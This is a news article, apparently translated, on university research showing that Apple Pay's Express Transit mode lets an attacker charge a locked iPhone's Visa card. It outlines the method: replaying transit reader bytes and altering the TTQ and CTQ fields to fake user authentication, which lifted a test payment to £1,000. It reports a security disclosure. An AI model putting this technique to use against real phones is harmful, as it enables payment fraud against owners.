the gist Researchers at the University of Birmingham and the University of Surrey have shown that cybercriminals could make fraudulent purchases by bypassing the Apple Pay lock screen of an iPhone . They could also hijack the limits of contactless payment.
The user of a smartphone, to make a payment via an application, must for example scan his fingerprint or Face ID, or enter his PIN code to authenticate the transaction, which reduces the risk of attacks. To “facilitate payment at transport ticketing barrier stations”, Apple implemented the Express Transit / Travel feature, allowing you to use Apple Pay without unlocking the phone, in 2019 .
“We show that this feature can be exploited to bypass the Apple Pay lock screen, and pay illicitly from a locked iPhone, using a Visa card, to any EMV reader, for n ‘ any amount, without the user’s permission, “the researchers then explain in a research article.
“The attack works”
To do this hack, the iPhone must have a Visa card configured for payment with Express Travel mode enabled. The victim should not be far away, even if their phone is in their luggage. “The attack works by first replaying the Magic Bytes to the iPhone, so that it believes the transaction is taking place with a transport EMV reader. Then, when transmitting the EMV messages, the transaction qualifiers terminal (TTQ), sent by the EMV terminal, must be changed so that the bits for offline data authentication (ODA), online authorizations and EMV mode are enabled “, the researchers explain.
The limit of contactless payment could also be abused, because of a modification of the Card Transaction Qualifiers (CTQ). “This is to trick the EMV reader into believing that user authentication on the device has been performed (for example, by fingerprint). The CTQ value appears in two messages sent by the iPhone and should be modified in both occurrences “. Thus, during their test, the researchers were able to carry out a transaction of 1 000 pounds, or approximately 1 180 euros.